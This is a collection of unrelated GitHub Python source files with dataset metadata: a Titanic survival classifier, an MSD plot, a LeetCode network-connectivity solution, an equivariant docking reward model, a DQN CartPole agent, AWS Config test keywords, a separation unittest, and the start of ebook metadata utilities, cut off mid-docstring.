df_train.Name.apply(\n lambda x: x.split(',')[1].split('.')[0].strip()) # Retrieve title from Name\ndf_test['Name_title'] = df_test.Name.apply(lambda x: x.split(',')[1].split('.')[0].strip())\n\ndf_train['freq_Ticket'] = df_train.groupby('Ticket')['Ticket'].transform('count') # Indicates n people travelling\n# with the same ticket\ndf_test['freq_Ticket'] = df_test.groupby('Ticket')['Ticket'].transform('count')\n\n# B.1.2 Creating new features from Binning Continuous features\ndf_train['bin_Fare'] = pd.qcut(df_train['Fare'], 15)\ndf_test['bin_Fare'] = pd.qcut(df_test['Fare'], 15)\n\ndf_train['bin_Age'] = pd.qcut(df_train['Age'], 10)\ndf_test['bin_Age'] = pd.qcut(df_test['Age'], 10)\n\n# B.3 Binary Encoding\ndf_train['bin_Sex'] = df_train.Sex.map({'male': 0, 'female': 1}) # Map binary 'Sex'\ndf_test['bin_Sex'] = df_test.Sex.map({'male': 0, 'female': 1})\n\n# B.4 Frequency Encoding\nencoding = {1: 'Alone', 2: 'Small', 3: 'Small', 4: 'Small', 5: 'Large', 6: 'Large', 7: 'Large', 8: 'Large',\n 9: 'Large', 10: 'Large', 11: 'Large', 12: 'Large'} # Based on Countplot families of 2-4 persons are 'Small'\ndf_train[f'ord_Family_Size'] = df_train['Family_Size'].map(encoding)\ndf_test[f'ord_Family_Size'] = df_test['Family_Size'].map(encoding)\n\n# B.5 Label Encoding\ncol_label = ['Embarked', 'bin_Fare', 'bin_Age', 'Cabin_section', 'Name_title', 'ord_Family_Size']\ndf_train = enc_label(df_train, col_label)\ndf_test = enc_label(df_test, col_label)\n\n# B.6 1-Hot Encoding\ndf_train = enc_1hot(df_train, 'Embarked') # one-hot encode categorical feature 'Embarked'\ndf_test = enc_1hot(df_test, 'Embarked')\n\n# B.X Feature Engineering plots\nif PLOT:\n plot_count(df_train, ['Family_Size']) # Plot B.1.1 Creating new features from arithmetics\n plot_count(df_train, ['Cabin_n']) # Plot B.1.1 Creating new features from arithmetics\n plot_count(df_train, ['Cabin_section']) # Plot B.1.1 Creating new features from arithmetics\n plot_count(df_train, ['Name_title']) # Plot B.1.1 Creating new features from arithmetics\n plot_count(df_train, ['bin_Fare']) # Plot B.1.2 Creating new features from Binning Continuous features\n plot_count(df_train, ['bin_Age']) # Plot B.1.2 Creating new features from Binning Continuous features\n\n# Plotting the data\n# plot_corr(df_train, col_num) # Plot Correlation Heatmap for numerical features\n# plot_mi_scores(mi_scores.head(20)) # Plot MI scores for numerical features\n\n\"\"\"\nC. Model:\n\"\"\"\n\n# C.1 Model Data selection\ny = df_train['Survived']\n\nfeature_scope = df_test.select_dtypes(include=['float64', 'int64', 'int32', 'uint8']).columns\nX = df_train[feature_scope]\nX_test = df_test[feature_scope] # Source data for predicting Titanic survivors\n\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, random_state=SEED) # Setup train/test data\n\n\"\"\"\"\nThe steps to building and using a model are:\n\nSpecify: Define the type of model that will be used, and the parameters of the model.\nFit: Capture patterns from provided data. This is the heart of modeling.\nPredict: Predict the values for the prediction target (y)\nEvaluate: Determine how accurate the model's predictions are.\n\"\"\"\n\n# C.2 Model specification\ndir_model = 'modelsTrained/'\n\nif TRAIN:\n\n # C.2.1 Random Forest Classifier\n model_Forest = RandomForestClassifier(max_depth=5, min_samples_split=4, min_samples_leaf=5, max_features='auto',\n random_state=SEED)\n\n # C.2.2 Model Selection\n model = model_Forest\n\n # C.2.3 Model Training\n model.fit(X_train, y_train)\n\nelse:\n filename_model = 'trained_modelForest.sav'\n filepath_model = os.path.join(dir_model, filename)\n model = pickle.load(open(filepath_model, 'rb'))\n print(f'Loading pickled model: {filepath_model}')\n\npredictions_train = model.predict(X_valid)\n\n# C.3 Model Evaluation (metrics)\nrmse = mean_squared_error(y_true=y_valid, y_pred=predictions_train, squared=False)\nprint(f'Competition score metric! Root Mean Squared Error: {rmse:.4f}') # Best possible score is: 0.0000\nmae = mean_absolute_error(y_true=y_valid, y_pred=predictions_train)\nprint(f'Mean Absolute Error: {mae:.4f}') # Best possible score is: 0.0000\nmse = mean_squared_error(y_true=y_valid, y_pred=predictions_train, squared=True)\nprint(f'Mean Squared Error: {mse:.4f}') # Best possible score is: 0.0000\nmape = mean_absolute_percentage_error(y_true=y_valid, y_pred=predictions_train)\nprint(f'Mean Absolute Percentage Error: {mape:.2%}') # Best possible score is: 0.00%\nevs = explained_variance_score(y_true=y_valid, y_pred=predictions_train)\nprint(f'Explained Variance Score: {evs:.2f}') # Best possible score is: 1.00\n\n# Save model to disk (pickle model)\ntimestamp = f'{datetime.datetime.now():%d%m%y_%H%M}'\n\nif SAVE:\n filename_model = f'trained_modelForest_{timestamp}.sav'\n filepath_model = os.path.join(dir_model, filename_model)\n pickle.dump(model, open(filepath_model, 'wb'))\n print(f'Saved pickled model: {filepath_model}')\n\n# D. Output\npredictions = model.predict(X_test)\noutput = pd.DataFrame({'PassengerId': df_output.PassengerId, 'Survived': predictions})\n\ndir_output = 'outputData/'\nfilename_output = f'survivor_estimation_{timestamp}.csv'\nfilepath_output = os.path.join(dir_output, filename_output)\noutput.to_csv(filepath_output, index=False)\nprint(f'The survivor estimation of the test data was saved to {filepath_output}')\n\n\"\"\"\n# Compare the survivor estimation against actual survivor observations\ndf = pd.merge(df_test[['Name', 'PassengerId']], df_titanic[['name', 'survived']], left_on='Name', right_on='name',\n how='left') \\\n .drop_duplicates(subset='PassengerId')\ndf2 = pd.merge(output.set_index('PassengerId'), df.set_index('PassengerId'), left_index=True, right_index=True,\n how='left')\n\ndf2['correct'] = df2['Survived'] == df2['survived']\n\n# Calculate success rate of random forest survival estimation\nsuccess_rate = sum(df2['correct']) / len(df2['correct'])\nprint(f'The random forest predicted {success_rate:.2%} survivors correctly!')\n\"\"\"","repo_name":"ysuurme/kaggle_Titanic","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1231569179","text":"import h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#plot mean square displacement over time\n\n#load ana data\nwith h5py.File(f'coord_ana.h5', 'r') as f:\n MSD=np.array(f['MSD'])\n delta_mc_MSD=np.array([f['MSD'].attrs[\"DeltaMC\"]])\n \nMSDA=MSD[:,3]\nt_end=len(MSDA)*delta_mc_MSD\nt=np.arange(0,t_end,delta_mc_MSD)\nplt.plot(t,MSDA)\nplt.show()\n","repo_name":"justusm00/soma_mod","sub_path":"python_routines/plot_MSD.py","file_name":"plot_MSD.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8126146921","text":"# There are n computers numbered \n# from 0 to n - 1 connected by ethernet cables connections forming a network where connections[i] = [ai, bi] represents a connection between computers ai and bi. Any computer can reach any other computer directly or indirectly through the network.\n\n# You are given an initial computer network connections. \n# You can extract certain cables between two directly connected computers, and place them between any pair of disconnected computers to make them directly connected.\n\n# Return the minimum number of times you need to do this \n# in order to make all the computers connected. If it is not possible, return -1.\n\n\nfrom collections import defaultdict\n\n\nclass Solution(object):\n def makeConnected(self, n, connections):\n \"\"\"\n :type n: int\n :type connections: List[List[int]]\n :rtype: int\n \"\"\"\n if len(connections) < n - 1:\n return -1\n graph = defaultdict(set)\n for u, v in connections:\n graph[u].add(v)\n graph[v].add(u)\n \n visited = set()\n \n def dfs(node):\n if node in visited:\n return 0\n visited.add(node)\n for adj in graph[node]:\n dfs(adj)\n return 1\n \n \n # number of DSUs - 1\n return sum(dfs(node) for node in range(n)) - 1\n \n \n\n\nif __name__ == \"__main__\":\n s = Solution()\n n = 4\n connections = [[0,1],[0,2],[1,2]]\n s.makeConnected(n, connections)","repo_name":"YingbingZhu/python_leetcode","sub_path":"graph/1319.Number of Operations to Make Network Connected.py","file_name":"1319.Number of Operations to Make Network Connected.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36014154334","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom e3nn import o3\nfrom torch_scatter import scatter, scatter_mean, scatter_add\nfrom torch_cluster import radius, radius_graph\n\nfrom dockgame.utils.geometry import apply_rigid_transform\nfrom dockgame.common.constants import DEVICE\n\nfrom dockgame.models.dock_reward import (\n sample_rigid_body_transform, get_activation_layer,\n TensorProductConvLayer, GaussianSmearing\n)\n\n\nclass RewardModelHetero(nn.Module):\n\n def __init__(self,\n node_fdim: int,\n edge_fdim: int,\n sh_lmax: int = 2,\n n_s: int = 16,\n n_v: int = 4,\n n_conv_layers: int = 2,\n max_radius: float = 10.0,\n cross_max_radius: float = 10.0,\n distance_emb_dim: int = 32,\n cross_dist_emb_dim: int = 32,\n dropout_p: float = 0.1,\n activation: str = \"relu\", \n enforce_stability=False, n_deviations: int = 0, \n deviation_eps: float = 0.01,**kwargs\n ):\n \n super().__init__(**kwargs)\n\n self.node_fdim = node_fdim\n self.edge_fdim = edge_fdim\n self.sh_irreps = o3.Irreps.spherical_harmonics(lmax=sh_lmax)\n self.n_s, self.n_v = n_s, n_v\n self.n_conv_layers = n_conv_layers\n\n self.max_radius = max_radius\n self.cross_max_radius = cross_max_radius\n self.enforce_stability = enforce_stability\n\n self.n_deviations = n_deviations\n self.deviation_eps = deviation_eps\n \n irrep_seq = [\n f\"{n_s}x0e\",\n f\"{n_s}x0e + {n_v}x1o\",\n f\"{n_s}x0e + {n_v}x1o + {n_v}x1e\",\n f\"{n_s}x0e + {n_v}x1o + {n_v}x1e + {n_s}x0o\"\n ]\n\n act_layer = get_activation_layer(activation)\n\n self.node_embedding = nn.Sequential(\n nn.Linear(node_fdim, n_s),\n act_layer,\n nn.Dropout(dropout_p) if dropout_p else nn.Identity(),\n nn.Linear(n_s, n_s)\n )\n\n if cross_dist_emb_dim is None:\n cross_dist_emb_dim = distance_emb_dim\n\n self.edge_embedding = nn.Sequential(\n nn.Linear(edge_fdim + distance_emb_dim, n_s),\n act_layer,\n nn.Dropout(dropout_p) if dropout_p else nn.Identity(),\n nn.Linear(n_s, n_s)\n )\n\n self.cross_edge_embedding = nn.Sequential(\n nn.Linear(edge_fdim + cross_dist_emb_dim, n_s),\n act_layer,\n nn.Dropout(dropout_p) if dropout_p else nn.Identity(),\n nn.Linear(n_s, n_s)\n )\n\n self.dist_expansion = GaussianSmearing(\n start=0.0, stop=max_radius, \n num_gaussians=distance_emb_dim\n )\n self.cross_dist_expansion = GaussianSmearing(\n start=0.0, stop=cross_max_radius, \n num_gaussians=cross_dist_emb_dim\n )\n\n conv_layers, cross_conv_layers = [], []\n\n for i in range(n_conv_layers):\n in_irreps = irrep_seq[min(i, len(irrep_seq)-1)]\n out_irreps = irrep_seq[min(i+1, len(irrep_seq)-1)]\n\n parameters = {\n \"in_irreps\": in_irreps,\n \"sh_irreps\": self.sh_irreps,\n \"out_irreps\": out_irreps,\n \"edge_fdim\": 3 * n_s,\n \"h_dim\": 3 * n_s,\n \"residual\": False,\n \"dropout\": dropout_p,\n }\n\n conv_layer = TensorProductConvLayer(**parameters)\n cross_conv_layer = TensorProductConvLayer(**parameters)\n\n conv_layers.append(conv_layer)\n cross_conv_layers.append(cross_conv_layer)\n\n self.conv_layers = nn.ModuleList(conv_layers)\n self.cross_conv_layers = nn.ModuleList(cross_conv_layers)\n\n self.energy_predictor_edges = nn.Sequential(\n #nn.Linear(4* self.n_s + distance_emb_dim if n_conv_layers >= 3 else 2 * self.n_s + distance_emb_dim, self.n_s),\n nn.Linear(5 * self.n_s if n_conv_layers >= 3 else 3 * self.n_s, self.n_s),\n act_layer,\n nn.Dropout(dropout_p),\n nn.Linear(self.n_s, self.n_s),\n act_layer,\n nn.Dropout(dropout_p),\n nn.Linear(self.n_s, 1),\n )\n\n self.energy_predictor_nodes = nn.Sequential(\n nn.Linear(2 * self.n_s if n_conv_layers >= 3 else self.n_s, 2 * self.n_s),\n act_layer,\n nn.Dropout(dropout_p),\n nn.Linear(2 * self.n_s, self.n_s),\n act_layer,\n nn.Dropout(dropout_p),\n nn.Linear(self.n_s, 1),\n )\n\n def forward(self, data):\n graph = self.setup_graph(data, pos_to_use=\"current\")\n graph_ref = self.setup_graph(data, pos_to_use=\"ref\")\n\n cross_graph = self.setup_cross_graph(data, pos_to_use=\"current\")\n cross_graph_ref = self.setup_cross_graph(data, pos_to_use=\"ref\")\n\n energy = self.compute_energy(graph, cross_graph, data.batch)\n energy_ref = self.compute_energy(graph_ref, cross_graph_ref, data.batch)\n energy_diff = energy - energy_ref\n\n energy_deviations = None\n energy_bound = None\n\n return (energy, energy_ref, energy_diff), (energy_deviations, energy_bound)\n\n def compute_energy(self, graph, cross_graph, batch):\n x, edge_index, edge_attr, edge_sh = graph\n\n src, dst = edge_index\n x = self.node_embedding(x)\n edge_attr = self.edge_embedding(edge_attr)\n\n cross_edge_index, cross_edge_attr, cross_edge_sh = cross_graph\n cross_src, cross_dst = cross_edge_index\n cross_edge_attr = self.cross_edge_embedding(cross_edge_attr)\n\n for i in range(self.n_conv_layers):\n edge_attr_ = torch.cat([edge_attr, x[src, :self.n_s], x[dst, :self.n_s]], dim=-1)\n x_intra_update = self.conv_layers[i](x, edge_index, edge_attr_, edge_sh)\n\n cross_edge_attr_ = torch.cat([cross_edge_attr, x[cross_src, :self.n_s], x[cross_dst, :self.n_s]], dim=-1)\n x_inter_update = self.cross_conv_layers[i](x, cross_edge_index, cross_edge_attr_, cross_edge_sh)\n\n x = F.pad(x, (0, x_intra_update.shape[-1] - x.shape[-1]))\n x = x + x_intra_update + x_inter_update\n\n x_src = torch.cat([x[src,:self.n_s], x[src,-self.n_s:]], dim=1) \\\n if self.n_conv_layers >= 3 else x[src,:self.n_s] # (n_edges, emb_dim)\n x_dst = torch.cat([x[dst,:self.n_s], x[dst,-self.n_s:]], dim=1) \\\n if self.n_conv_layers >= 3 else x[dst,:self.n_s]\n x_feats = torch.cat([x_src, x_dst], dim=-1)\n\n energy_inputs_edges = torch.cat([edge_attr, x_feats], dim=-1)\n energy_inputs_nodes = torch.cat([x[:, :self.n_s], x[:, -self.n_s:]], dim=1) \\\n if self.n_conv_layers >= 3 else x[:, :self.n_s]\n \n energy_nodes = self.energy_predictor_nodes(energy_inputs_nodes) \n energy_edges = self.energy_predictor_edges(energy_inputs_edges)\n\n edge_batch = batch[src]\n\n energy_nodes_agg = scatter_mean(energy_nodes, index=batch, dim=0)\n energy_edges_agg = scatter_mean(energy_edges, index=edge_batch, dim=0)\n \n energy = energy_edges_agg + energy_nodes_agg\n return energy\n \n def predict(self, data):\n graph = self.setup_graph(data=data, pos_to_use=\"current\")\n cross_graph = self.setup_cross_graph(data=data, pos_to_use='current')\n energy = self.compute_energy(graph, cross_graph, data.batch)\n return energy\n\n def setup_graph(self, data, pos_to_use: str = 'current'):\n if pos_to_use == 'current':\n pos = data.pos\n elif pos_to_use == 'ref':\n pos = data.pos_ref\n\n edge_index = data.edge_index\n src, dst = edge_index\n edge_vec = pos[src.long()] - pos[dst.long()]\n\n edge_length_emb = self.dist_expansion(edge_vec.norm(dim=-1))\n edge_sh = o3.spherical_harmonics(self.sh_irreps, edge_vec, normalization='component', normalize=True)\n\n return data.x, edge_index, edge_length_emb, edge_sh\n \n def setup_cross_graph(self, data, pos_to_use: str = 'current'):\n\n if pos_to_use == \"current\":\n pos = data.pos\n cross_edge_index = data.cross_edge_index\n\n elif pos_to_use == \"ref\":\n pos = data.pos_ref\n cross_edge_index = data.ref_cross_edge_index\n\n cross_src, cross_dst = cross_edge_index\n edge_vec = pos[cross_src.long()] - pos[cross_dst.long()]\n\n edge_length_emb = self.cross_dist_expansion(edge_vec.norm(dim=-1))\n cross_edge_sh = o3.spherical_harmonics(\n self.sh_irreps, edge_vec, normalization='component', normalize=True)\n\n return cross_edge_index, edge_length_emb, cross_edge_sh\n","repo_name":"vsomnath/dockgame","sub_path":"dockgame/models/dock_reward_hetero.py","file_name":"dock_reward_hetero.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"32179510830","text":"import gym\nimport math, random\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom collections import deque\n\n# maximum steps per episode\nMAX_STEPS_EPI = 1000\n\nclass DQNController():\n\n def __init__(self, env, learning=False, testing=False, learning_rate=0.001, alpha=0.5, epsilon=0.5, \n epsilon_thr=0.05, gamma=0.99, experience_size=3000, batch_size=16 ):\n\n self.done = False\n self.countSteps = 0\n self.nEpisodes = 0\n\n # valid actions\n self.valid_actions = [0, 1]\n\n '''\n Parameters of the agent\n '''\n self.env = env\n self.learning = learning\n self.testing = testing\n\n # learning rates\n self.learning_rate = learning_rate\n self.alpha = alpha\n\n # exploration-explotation\n self.epsilon = epsilon\n self.epsilon_thr = epsilon_thr\n\n # discount\n self.gamma = gamma\n\n # list to store the agent's experience\n self.experience = deque(maxlen=experience_size)\n self.batch_size = batch_size\n\n\n\n self.state_size = env.observation_space.shape[0]\n self.action_size = env.action_space.n\n\n # build neural network model\n self.model = self.define_nn()\n\n\n '''\n Defines Neural Network arquitecture for Deep Q Learning\n '''\n def define_nn(self):\n model = Sequential()\n model.add(Dense(32, input_dim=self.state_size, activation='relu'))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(self.action_size, activation='linear'))\n model.compile(loss='mse',\n optimizer=Adam(lr=self.learning_rate))\n return model\n\n def store(self, state, action, reward, state_previous, done):\n self.experience.append((state, action, reward, state_previous, done))\n\n '''\n - Resets the value of the environment to run a new episode\n - Updates the exploration-explotation rate\n '''\n def reset(self):\n self.env.reset()\n self.countSteps = 0\n self.nEpisodes += 1\n self.done = False\n\n # choose epsilon decay function\n decayF = 1\n\n if self.epsilon < self.epsilon_thr:\n # guarantee some exploration\n self.epsilon = self.epsilon_thr\n\n # decay epsilon each episode\n elif decayF == 0:\n # linear decay\n self.epsilon -= 0.05\n\n elif decayF == 1:\n # exponential decay\n aDecay = 0.8\n self.epsilon = aDecay ** self.nEpisodes\n\n elif decayF == 2:\n # quadratic inverse\n if self.nEpisodes == 0:\n self.epsilon = 1\n else:\n self.epsilon = self.nEpisodes ** (-2)\n\n elif decayF == 3:\n # exponential decay 2\n aDecay = 0.9\n self.epsilon = math.exp(-aDecay * self.nEpisodes)\n \n elif decayF == 4:\n aDecay = 0.1\n self.epsilon = math.cos(aDecay * self.nEpisodes)\n\n print(\"Epsilon: %f\" % self.epsilon)\n\n\n '''\n Save and Load parameters for the neural network\n '''\n def load_model(self, filename):\n self.model.load_weights(filename)\n\n def save_model(self, filename):\n self.model.save_weights(filename)\n\n '''\n Chooses the action the agent will carry out\n '''\n def choose_action(self):\n\n if self.learning == False:\n # random action\n return random.choice(self.valid_actions)\n \n # sample exploration-explotation distribution\n sampleEE = random.random()\n if sampleEE <= self.epsilon:\n # random action\n return random.choice(self.valid_actions)\n\n # action based on highest Q-value\n action_val = self.model.predict(self.state)\n print(action_val)\n return np.argmax(action_val[0])\n\n '''\n Updates the neural network coefficients using minibatches\n '''\n def learn(self):\n if self.learning == True:\n if len(self.experience) <= self.batch_size:\n minibatch = random.sample(self.experience, len(self.experience))\n else:\n minibatch = random.sample(self.experience, self.batch_size)\n\n for state, action, reward, state_previous, done in minibatch:\n target = reward\n if not done: #TRY WITHOUT THIS LINE\n target = (reward + self.gamma *\n np.amax(self.model.predict(state)[0]))\n target_f = self.model.predict(state_previous)\n target_f[0][action] = target \n self.model.fit(state_previous, target_f, epochs=1, verbose=0)\n\n def step(self):\n self.countSteps += 1\n # calculate action\n self.action = self.choose_action()\n\n # apply action and get feedback from environment\n self.state, self.reward, self.done, _ = self.env.step(self.action)\n\n # reshape state for input in NN\n self.state = np.reshape(self.state, [1, self.state_size])\n\n # highly penalize failing\n if not self.done:\n self.reward = -10.0\n\n # highly reward not having failed in \n if self.countSteps > MAX_STEPS_EPI:\n self.reward = 10.0\n\n # store history for future replay\n if self.countSteps != 1:\n self.store(self.state, self.action, self.reward, self.state_previous, self.done)\n\n # learn\n self.learn()\n\n # update previous state\n self.state_previous = self.state \n '''\n Runs an episode on the Environment\n '''\n def run(self):\n\n while (self.done == False or self.countSteps > MAX_STEPS_EPI):\n print(\" Step: %d\" % self.countSteps)\n if self.testing == True:\n self.env.render()\n \n # perform another simulation step\n self.step()","repo_name":"AlbertoCastelo/Deep-Q-Learning-for-OpenAI","sub_path":"DQNController.py","file_name":"DQNController.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5798739951","text":"# -------------------------------------------------------\r\n# TECHNOGIX\r\n# -------------------------------------------------------\r\n# Copyright (c) [2022] Technogix SARL\r\n# All rights reserved\r\n# -------------------------------------------------------\r\n# Keywords to create data for module test\r\n# -------------------------------------------------------\r\n# Nadège LEMPERIERE, @13 november 2021\r\n# Latest revision: 13 november 2021\r\n# -------------------------------------------------------\r\n\r\n# System includes\r\nfrom json import load, dumps\r\n\r\n# Robotframework includes\r\nfrom robot.libraries.BuiltIn import BuiltIn, _Misc\r\nfrom robot.api import logger as logger\r\nfrom robot.api.deco import keyword\r\nROBOT = False\r\n\r\n# ip address manipulation\r\nfrom ipaddress import IPv4Network\r\n\r\n@keyword('Load Standard Test Data')\r\ndef load_standard_test_data(bucket, loggroup, config, account, region) :\r\n\r\n result = {}\r\n result['config'] = []\r\n\r\n result['config'].append({})\r\n result['config'][0]['name'] = 'config'\r\n result['config'][0]['data'] = {}\r\n\r\n result['config'][0]['data']['roleARN'] = loggroup['role']\r\n result['config'][0]['data']['recordingGroup'] = {\r\n 'allSupported' : True\r\n }\r\n # result['config'][0]['data']['Status'] = True\r\n # status takes a while to switch to true\r\n\r\n result['rule'] = []\r\n\r\n result['rule'].append({})\r\n result['rule'][0]['name'] = 'rule'\r\n result['rule'][0]['data'] = {}\r\n\r\n result['rule'][0]['data']['Source'] = {}\r\n result['rule'][0]['data']['Source']['Owner'] = 'AWS'\r\n result['rule'][0]['data']['Source']['SourceIdentifier'] = 'EIP_ATTACHED'\r\n result['rule'][0]['data']['ConfigRuleState'] = 'ACTIVE'\r\n result['rule'][0]['data']['Scope'] = {}\r\n result['rule'][0]['data']['Scope']['ComplianceResourceTypes'] = ['AWS::EC2::EIP']\r\n\r\n logger.debug(dumps(result))\r\n\r\n return result\r\n","repo_name":"technogix-terraform/module-aws-config","sub_path":"test/keywords/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1722214487","text":"import unittest\n\n__author__ = 'ptoth'\n\n\nclass FindSeparationTests(unittest.TestCase):\n\n def arr1_test(self):\n arr = [1, 1, -1, -1]\n self.assertTupleEqual(self.get_separation_with_minimal_error(arr), (1, 4, 0))\n\n def arr2_test(self):\n arr = [-1, 1, 1, 1]\n self.assertTupleEqual(self.get_separation_with_minimal_error(arr), (0, 4, 0))\n\n def arr3_test(self):\n arr = [1, -1, 1, -1, -1]\n self.assertTupleEqual(self.get_separation_with_minimal_error(arr), (0, 4, 1))\n\n def arr4_test(self):\n arr = [1, 1, 1, -1, -1, -1, 1, 1, 1, -1, -1, -1]\n self.assertTupleEqual(self.get_separation_with_minimal_error(arr), (2, 9, 3))\n\n def get_separation_with_minimal_error(self, array):\n\n ones = 0\n minus_ones = 0\n\n # determine total number of 1's and -1's\n for idx, el in enumerate(array):\n if el == 1:\n ones += 1\n else:\n minus_ones += 1\n\n left_ones = 0\n left_minusones = 0\n sep_error = -1\n sep_index = 0\n error = -1\n for idx, el in enumerate(array):\n # running through the array at each element wi determine\n # number of 1's and -1's in the left vs. right subarray\n if el == 1:\n left_ones += 1\n else:\n left_minusones += 1\n right_ones = ones - left_ones\n right_minus_ones = minus_ones - left_minusones\n\n # we want to homogenize the subarrays as much as possible in a way\n # that we determine which subarray is more pos or more neg\n # we measure the separation of the cut as\n # the maximum of\n # the number of 1's in the left plus number of -1's in right and\n # the number of -1's in the left plus the number of 1's in the right\n cur_error = max(left_ones + right_minus_ones, left_minusones + right_ones)\n if cur_error > sep_error:\n sep_error = cur_error\n sep_index = idx\n # the actual error will be the maximum of the difference in homogeneity between the sides\n error = max(min(left_minusones, left_ones), min(right_minus_ones, right_ones))\n\n return sep_index, sep_error, error\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"eidonfiloi/SparseRecurrentNetwork","sub_path":"tests/min_seperation.py","file_name":"min_seperation.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"72916643986","text":"\"\"\"\nProvides abstraction for metadata reading.writing from a variety of ebook\nformats.\n\"\"\"\nimport mimetypes\nimport os\nimport re\nimport sys\nimport urllib.parse\n\nfrom ebook_converter.utils.config_base import tweaks\nfrom ebook_converter import polyglot\nfrom ebook_converter.utils import encoding as uenc\n\n\ntry:\n _author_pat = re.compile(tweaks['authors_split_regex'])\nexcept Exception:\n print(f\"Author split regexp: {tweaks['authors_split_regex']}, is invalid, \"\n f\"using default\")\n _author_pat = re.compile(r'(?i),?\\s+(and|with)\\s+')\n\n\ndef string_to_authors(raw):\n if not raw:\n return []\n raw = raw.replace('&&', '\\uffff')\n raw = _author_pat.sub('&', raw)\n authors = [a.strip().replace('\\uffff', '&') for a in raw.split('&')]\n return [a for a in authors if a]\n\n\ndef authors_to_string(authors):\n if authors is not None:\n return ' & '.join([a.replace('&', '&&') for a in authors if a])\n else:\n return ''\n\n\ndef remove_bracketed_text(src, brackets=None):\n if brackets is None:\n brackets = {'(': ')', '[': ']', '{': '}'}\n from collections import Counter\n counts = Counter()\n buf = []\n src = uenc.force_unicode(src)\n rmap = {v: k for k, v in brackets.items()}\n for char in src:\n if char in brackets:\n counts[char] += 1\n elif char in rmap:\n idx = rmap[char]\n if counts[idx] > 0:\n counts[idx] -= 1\n elif sum(counts.values()) < 1:\n buf.append(char)\n return ''.join(buf)\n\n\ndef author_to_author_sort(author, method=None):\n if not author:\n return ''\n sauthor = remove_bracketed_text(author).strip()\n tokens = sauthor.split()\n if len(tokens) < 2:\n return author\n if method is None:\n method = tweaks['author_sort_copy_method']\n\n ltoks = frozenset(x.lower() for x in tokens)\n copy_words = frozenset(x.lower() for x in tweaks['author_name_copywords'])\n if ltoks.intersection(copy_words):\n method = 'copy'\n\n if method == 'copy':\n return author\n\n prefixes = {uenc.force_unicode(y).lower()\n for y in tweaks['author_name_prefixes']}\n prefixes |= {y+'.' for y in prefixes}\n while True:\n if not tokens:\n return author\n tok = tokens[0].lower()\n if tok in prefixes:\n tokens = tokens[1:]\n else:\n break\n\n suffixes = {uenc.force_unicode(y).lower()\n for y in tweaks['author_name_suffixes']}\n suffixes |= {y+'.' for y in suffixes}\n\n suffix = ''\n while True:\n if not tokens:\n return author\n last = tokens[-1].lower()\n if last in suffixes:\n suffix = tokens[-1] + ' ' + suffix\n tokens = tokens[:-1]\n else:\n break\n suffix = suffix.strip()\n\n if method == 'comma' and ',' in ''.join(tokens):\n return author\n\n atokens = tokens[-1:] + tokens[:-1]\n num_toks = len(atokens)\n if suffix:\n atokens.append(suffix)\n\n if method != 'nocomma' and num_toks > 1:\n atokens[0] += ','\n\n return ' '.join(atokens)\n\n\ndef authors_to_sort_string(authors):\n return ' & '.join(map(author_to_author_sort, authors))\n\n\n_title_pats = {}\n\n\ndef get_title_sort_pat(lang=None):\n ans = _title_pats.get(lang, None)\n if ans is not None:\n return ans\n q = lang\n from ebook_converter.utils.localization import canonicalize_lang, get_lang\n if lang is None:\n q = tweaks['default_language_for_title_sort']\n if q is None:\n q = get_lang()\n q = canonicalize_lang(q) if q else q\n data = tweaks['per_language_title_sort_articles']\n try:\n ans = data.get(q, None)\n except AttributeError:\n ans = None # invalid tweak value\n try:\n ans = frozenset(ans) if ans else frozenset(data['eng'])\n except:\n ans = frozenset((r'A\\s+', r'The\\s+', r'An\\s+'))\n ans = '|'.join(ans)\n ans = '^(%s)' % ans\n try:\n ans = re.compile(ans, re.IGNORECASE)\n except:\n ans = re.compile(r'^(A|The|An)\\s+', re.IGNORECASE)\n _title_pats[lang] = ans\n return ans\n\n\n_ignore_starts = '\\'\"'+''.join(chr(x) for x in\n list(range(0x2018, 0x201e))+[0x2032, 0x2033])\n\n\ndef title_sort(title, order=None, lang=None):\n if order is None:\n order = tweaks['title_series_sorting']\n title = title.strip()\n if order == 'strictly_alphabetic':\n return title\n if title and title[0] in _ignore_starts:\n title = title[1:]\n match = get_title_sort_pat(lang).search(title)\n if match:\n try:\n prep = match.group(1)\n except IndexError:\n pass\n else:\n title = title[len(prep):] + ', ' + prep\n if title[0] in _ignore_starts:\n title = title[1:]\n return title.strip()\n\n\ncoding = list(zip(\n[1000,900,500,400,100,90,50,40,10,9,5,4,1],\n[\"M\",\"CM\",\"D\",\"CD\",\"C\",\"XC\",\"L\",\"XL\",\"X\",\"IX\",\"V\",\"IV\",\"I\"]\n))\n\n\ndef roman(num):\n if num <= 0 or num >= 4000 or int(num) != num:\n return str(num)\n result = []\n for d, r in coding:\n while num >= d:\n result.append(r)\n num -= d\n return ''.join(result)\n\n\ndef fmt_sidx(i, fmt='%.2f', use_roman=False):\n if i is None or i == '':\n i = 1\n try:\n i = float(i)\n except TypeError:\n return str(i)\n if int(i) == float(i):\n return roman(int(i)) if use_roman else '%d'%int(i)\n return fmt%i\n\n\nclass Resource(object):\n\n '''\n Represents a resource (usually a file on the filesystem or a 